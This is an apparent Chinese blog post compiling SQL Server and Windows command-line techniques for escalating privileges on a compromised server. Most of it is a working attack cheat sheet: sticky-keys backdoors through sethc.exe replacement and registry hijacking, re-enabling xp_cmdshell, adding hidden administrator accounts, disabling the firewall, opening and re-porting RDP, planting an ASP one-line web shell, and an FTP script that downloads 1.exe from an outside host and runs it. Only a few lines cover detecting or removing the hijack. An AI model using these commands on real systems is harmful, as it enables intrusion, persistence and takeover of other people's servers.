关闭

SQL提权语句整理

4435人阅读 评论(0) 收藏 举报
------------------------------CMD语句---------------------------------------
query user   查看会话


logoff       踢人命令


5下shift后门
系统后门:
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h


打开3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f


关闭系统防火墙
net stop sharedaccess
net stop policyagent   关闭IPSC


SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问
;EXEC sp_configure 'show advanced options', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'xp_cmdshell', 1 --
;RECONFIGURE WITH OVERRIDE -- 
;EXEC sp_configure   'show advanced options', 0 --


第一步执行:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call
*/
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
第二步执行
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int


直接加USER:


declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'net user 123 123 /add & net localgroup administrators 123 /add'




SQL沙盒提权


EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0


Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user admin$ 199181. /add")');


Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators admin$ /add")');


Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup Remote Desktop Users 123 /add")');


 
-----------------------------SQL语句--------------------------------------


修改SA密码:
Sp_password 'OldPassword','NewPassword'
sp_password Null,'199181','sa'




《防替换SHIFT》加属性
attrib c:\windows\system32\dllcache\sethc.exe +h +r +s 
attrib c:\windows\system32\sethc.exe +h +r +s


《防替换》去属性
attrib c:\windows\system32\sethc.exe -h -r -s
attrib c:\windows\system32\dllcache\sethc.exe -h -r -s


shift后门:
%SystemRoot%\explorer.exe


查询分离器SHIFT:
declare @o int 
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe'


declare @oo int 
exec sp_oacreate 'scripting.filesystemobject', @oo out 
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'


WIN2000直接建立用户:
exec xp_cmdshell 'net user admin$ 199181 /add' 
exec xp_cmdshell 'net localGroup Administrators admin$ /add' 


起用用户:
net user admin$ /active:yes 


查看3389终端:
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'


269998505
查看配置
systeminfo
劫持地址查看 boot.dat
-----------------------------SQL修复-----------------------------------------------
ipconfig :查看本地ip地址
type c:\boot.ini
                         解决127错误


第一步先删除:
drop procedure sp_addextendedproc 
drop procedure sp_oacreate 
exec sp_dropextendedproc 'xp_cmdshell'


第二步恢复:
dbcc addextendedproc ("sp_oacreate","odsole70.dll") 
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")


第一
exec sp_dropextendedproc 'xp_cmdshell'


第二
dbcc addextendedproc ("xp_cmdshell","d:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure   'show advanced options', 0 --


查看系统属性


EXEC xp_msver


declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\10.txt', 10
exec @ret = sp_oamethod @f, 'writeline', NULL,'open xabc.3322.org'
exec @ret = sp_oamethod @f, 'writeline', NULL,'123'
exec @ret = sp_oamethod @f, 'writeline', NULL,'123'
exec @ret = sp_oamethod @f, 'writeline', NULL,'binary'
exec @ret = sp_oamethod @f, 'writeline', NULL,'get 1.exe c:\1.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
exec @ret = sp_oamethod @f, 'writeline', NULL,'1.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'1.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'exit'




普通CMD后门
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'


SQL写一句话
exec master.dbo.xp_subdirs 'd:\web\cdlxkj'; 
exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '




映象劫持
EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
   


1.sql命令查询注册表粘滞键是否被劫持
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'


2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 
'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'


3.sql命令删除注册表粘滞键的劫持功能护你的服务器不再被他人利用
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
sql写文件〈写完后直接执行c:\1.vbs完成后建立user:test pass:1234>
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\2.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'




无NET提权的脚本


struser=wscript.arguments(0)
strpass=wscript.arguments(1)


set lp=createObject("WSCRIPT.NETWORK") 
oz="WinNT://"&lp.ComputerName 
Set ob=GetObject(oz) 
Set oe=GetObject(oz&"/Administrators,group") 
Set od=ob.create("user",struser) 
od.SetPassword strpass 
od.SetInfo 
Set of=GetObject(oz&"/" & struser & ",user") 
oe.Add(of.ADsPath) 


For Each admin in oe.Members
if struser=admin.Name then
Wscript.echo struser & " 建立成功!"
wscript.quit
end if
Next


Wscript.echo struser & " 用户建立失败!"
将以上保存为user.VBS文件
然后执行:cscript user.vbs 用户名 密码




1433无命令添加用户
用法很简单
扫到1433弱口令
net被禁止了的
把这个文件传到任何盘
然后输入命令"盘符+文件名+帐号+密码" 
如 c:\en.exe jksing jksing"
会自动添加到administrators组


type C:\boot.ini 系统
netstat -an 是查看服务器开放的端口
Ipconfig 本机IP ipconfig/all
net user admin 1985117 /add 这个就是添加管理员的dos口令admin$是用户名后面加个$号
net localgroup administrators admin /add这是dos下提升管理的口令
net user 要删除的用户名 /del
regedit 打开注册表
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享
net use c: /del  删除映射的c盘 net use * /del /y删除全部
net start telnet                                   启动 Telnet 服务  
net start Server                                   启动 Server 服务 (IPC$ 和共享要靠这个服务)
net stop Messenger                                 停止信使服务(不会在有烦人的Win的弹出广告了)!
net stop  server                                   停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵)      
net user                                           得到本地主机的用户列表




开启XP&2003终端服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
更改终端端口为20008(0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f


4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f




5.开启Win2000的终端,端口为3389(需重启)
echo Windows Registry Editor Version 5.00 >2000.reg 
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 
echo "Enabled"="0" >>2000.reg 
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 
echo "ShutdownWithoutLogon"="0" >>2000.reg 
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 
echo "TSEnabled"=dword:00000001 >>2000.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 
echo "Start"=dword:00000002 >>2000.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 
echo "Start"=dword:00000002 >>2000.reg 
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 
echo "Hotkey"="1" >>2000.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 
echo "PortNumber"=dword:00000D3D >>2000.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 
echo "PortNumber"=dword:00000D3D >>2000.reg


6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf


7.禁用TCP/IP端口筛选 (需重启)
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f


8.终端超出最大连接数时可用下面的命令来连接
mstsc /v:ip:3389 /console


9.调整NTFS分区权限
cacls c: /e /t /g everyone:F     (所有人对c盘都有一切权利)
cacls %systemroot%\system32\*.exe /d everyone     (拒绝所有人访问system32中exe文件)




首先开启三个服务
1.Server
2.Computer Browser
3.Workstation


0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:25237次
    • 积分:422
    • 等级:
    • 排名:千里之外
    • 原创:17篇
    • 转载:1篇
    • 译文:0篇
    • 评论:0条
    文章分类